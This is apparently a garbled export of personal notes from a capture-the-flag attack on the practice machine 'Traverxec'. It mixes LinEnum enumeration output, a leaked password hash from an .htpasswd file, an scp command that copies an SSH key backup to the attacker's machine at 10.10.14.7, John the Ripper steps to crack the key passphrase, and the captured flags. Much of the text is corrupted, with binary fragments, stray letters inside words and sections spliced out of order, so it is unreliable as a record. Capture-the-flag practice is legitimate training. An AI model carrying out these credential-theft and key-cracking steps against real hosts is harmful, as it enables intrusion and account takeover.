-rwxr-xr-x 1 root root 39K Aug 20 2019 systemd-fstab-generator -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-getty-generator -rwxr-xr-x 1 root root 30K Aug 20 2019 systemd-gpt-auto-generator -rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-hibernate-resume-generator -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-rc-local-generator -rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-run-generator -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-system-update-generator -rwxr-xr-x 1 root root 35K Aug 20 2019 systemd-sysv-generator -rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-veritysetup-generator /lib/systemd/system-preset: total 4.0K -rw-r--r-- 1 root root 951 Feb 14 2019 90-sNystemd.preset /lib/systemd/user-environment-generators: total 16K -rwxr-xr-x 1 root root 14K Aug 20 2019 30-systemd-environment-d-generator /lib/systemd/user-preset: total 4.0K -rw-r--r-- 1 root root 513 Feb 14 2019 90-systemd.preset /lib/systemd/boot: total 4.0K drwxr-xr-x 2 root root 4.0K Oct 25 2019 efi /lib/systemd/boot/efi: total 152K -rwxr-xr-x 1 root root 59K Aug 20 2019 linuxx64.efi.stub -rwxr-xr-x 1 root root 90K Aug 20 2019 systemd-bootx64.efi /lib/systemd/system-shutdown: total 0 /lib/systemd/user-generators: total 0 ### SOFTWARE ############################################# [-] Sudo version: Sudo version 1.8.27 [-] htpasswd found - could contain passwords: /var/nostromo/conf/.htpasswd david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/ ### INTERESTING FILES #################################### [-] Useful file locations: /usr/bin/nc /usr/bin/netcat /usr/bin/wget [-] Can we read/write sensitive files: -rw-r--r-O- 1 root root 1395 Oct 25 2019 /etc/passwd -rw-r--r-- 1 root root 708 Oct 25 2019 /etc/group -rw-r--r-- 1 root root 767 Mar 4 2016 /etc/profile -rw-r----- 1 root shadow 940 Oct 27 2019 /etc/shadow [-] SUID files: -rwsr-xr-x 1 root root 436552 Oct 6 2019 /usr/lib/openssh/ssh-keysign -r-sr-xr-x 1 root root 13628 Nov 12 2019 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper -r-sr-xr-x 1 root root 14320 Nov 12 2019 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper -rwsr-xr-- 1 root messagebus 51184 Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 157192 Oct 12 2019 /usr/bin/sudo -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount -rwsr-xr-x 1 rPoot root 44528 Jul 27 2018 /usr/bin/chsh -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn [-] SGID files: -rwxr-sr-x 1 root shadow 39616 Feb 14 2019 /usr/sbin/unix_chkpwd -rwxr-sr-x 1 root mail 18944 Dec 3 2017 /usr/bin/dotlockfile -rwxr-sr-x 1 root tty 34896 Jan 10 2019 /usr/bin/wall -rwxr-sr-x 1 root shadow 31000 Jul 27 2018 /usr/bin/expiry -rwxr-sr-x 1 root tty 14736 May 4 2018 /usr/bin/bsd-write -rwxr-sr-x 1 root crontab 43568 Jun 23 2019 /usr/bin/crontab -rwxr-sr-x 1 root shadow 71816 Jul 27 2018 /usr/bin/chage -rwxr-sr-x 1 root ssh 321672 Oct 6 2019 /usr/bin/ssh-agent [+] Files with POSIX capabilities set: /usr/bin/ping = cap_net_raw+ep [+] Private SSH keys found!: /home/david/LinEnum.sh /home/david/.ssh/id_rsa [+] AWS secret keys found!: /home/david/LinEnum.sh [-] NFS displaying partitions and filesystems - you need to check if exotic filesystems # Q/etc/fstab: static file system information. # # Use 'blkid' to print the universally unique identifier for a # device; this may be used with UUID= as a more robust way to name devices # that works even if disks are added and removed. See fstab(5). # # <file system> <mount point> <type> <options> <dump> <pass> # / was on /dev/sda1 during installation UUID=b94f39a4-394e-4755-bdc1-205c141583a6 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation UUID=4694341c-5642-4505-8593-0e44d799f109 none swap sw 0 0 /dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0 [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered [-] Can't search *.ini files as no keyword was entered [-] All *.conf files in /etc (recursive 1 level): -rw-r--r-- 1 root root 144 Oct 2R5 2019 /etc/kernel-img.conf -rw-r--r-- 1 root root 604 Jun 26 2016 /etc/deluser.conf -rw-r--r-- 1 root root 2007 Oct 25 2019 /etc/rsyslog.conf -rw-r--r-- 1 root root 435 Aug 22 2018 /etc/logrotate.conf -rw-r--r-- 1 root root 5713 Oct 25 2019 /etc/ca-certificates.conf -rw-r--r-- 1 root root 552 Feb 14 2019 /etc/pam.conf -rw-r--r-- 1 root root 1260 Dec 14 2018 /etc/ucf.conf -rw-r--r-- 1 root root 191 Apr 25 2019 /etc/libaudit.conf -rw-r--r-- 1 root root 2969 Feb 26 2019 /etc/debconf.conf -rw-r--r-- 1 root root 2584 Aug 1 2018 /etc/gai.conf -rw-r--r-- 1 root root 2384 Oct 25 2019 /etc/sysctl.conf -rw-r--r-- 1 root root 2981 Oct 25 2019 /etc/adduser.conf -rw-r--r-- 1 root root 9 Aug 7 2006 /etc/host.conf -rw-r--r-- 1 root root 812 Dec 15 2018 /etc/mke2fs.conf -rw-r--r-- 1 root root 510 Oct 25 2019 /etc/nsswitch.conf -rw-r--r-- 1 root root 642 Mar 1 2019 /etc/xattr.conf -rw-r--r-- 1 root root 346 Jan 14 2018 /etc/discover-modprobe.conf -rw-r--r-- 1 root root 5060 Oct 26 2018 /etc/hdparm.conf -rw-r--r-- 1 root root 61 Oct 25 2019 /etc/resolv.conf -rw-r--r-- 1 root root 3267 Aug 28 2019 /etc/reportbug.conf -rw-r--r-- 1 root root 34 Mar 2 2018 /etc/ld.so.conf [-] Current user's history files: lrwxrwxrwx 1 root root 9 Oct 25 2019 /home/david/.bash_history -> /dev/null [-] Location and contents (if accessible) of .bash_history file(s): /home/david/.bash_history [-] Location and Permissions (if accessible) of .bak file(s): -rw------- 1 root root 708 Oct 25 2019 /var/backups/group.bak -rw------- 1 root root 1395 Oct 25 2019 /var/backups/passwd.bak -rw------- 1 root shadow 597 Oct 25 2019 /var/backups/gshadow.bak -rw------- 1 root shadow 940 Oct 27 2019 /var/backups/shadow.bak [-] Any interesting mail in /var/mail: total 8 drwxrwsr-x 2 root mail 4096 Oct 25 2019 . drwxr-xr-x 12 root root 4096 Oct 25 2019 .. ### SCAN COMPLETE ####################################custom-colorsXAIZ|xAw X#X/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3QZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4*asswd www-data@traverxec:/var/nostromo/conf$ cat ./.htpasswd cat ./.htpasswd david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/ from nhttpd.conf # HOMEDIRS [OPTIONAL] homedirs /home homedirs_public public_www Changing back into david's home folder, I try to list out the public_www folder and actually get a result of a protected-file-area, which has a backup of ssh identities. Time to see if I can snag that file. $ scp ./public_www/protected-file-area/backup-ssh-identity-files.tgz kali@10.10.14.7:/home/kali/Desktop/Traverxec/sshbackups.tgz tar -xvf sshbackups.tgz We get these files. home/david/.ssh/ home/david/.ssh/authorized_keys home/david/.ssh/id_rsa home/david/.ssh/id_rsa.pub SSH as David time. Aaaaannnnddd ROADBLOCK. Of course the RSA key has a passphrase. No big deal. I can kick that into John and hopefully crack it with rockyou.txt. kali@kali:~/Desktop/Traverxec/home/david/.ssh$ python3 /usr/share/john/ssh2john.py id_rsa > ../../../hash.txt custom-colors*AM  /9'  Software VersionsSoftware Versions Potential Exploitscustom-colorsANlH{x//'  Proof\Flags\Otherdavid@traverxec:~$ cat user.txt 7db0b48469606a42cec20750d9782f3d root@traverxec:/home/david/bin# cat /root/root.txt 9aa36a6d76f785dfd320a478f6e0d906 custom-colors$AӕYa'  Passwordswww-data@traverxec:/var/nostromo/conf$ cat ./.htpasswd cat ./.htpasswd david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/ custom-colors$A~f'   Hashescustom-colors$A?&& ]X/]'  Running ProcessesProcess Listcustom-colob/c'  Post ExploitationCheck Nostromo configs and .htpT/)q'  Script Results ######################################################### # Local Linux Enumeration & Privilege Escalation Script # ######################################################### # www.rebootuser.com # version 0.982 [-] Debug Info [+] Thorough tests = Enabled Scan started at: Wed 26 Aug 2020 11:36:59 PM EDT  ### SYSTEM ############################################## [-] Kernel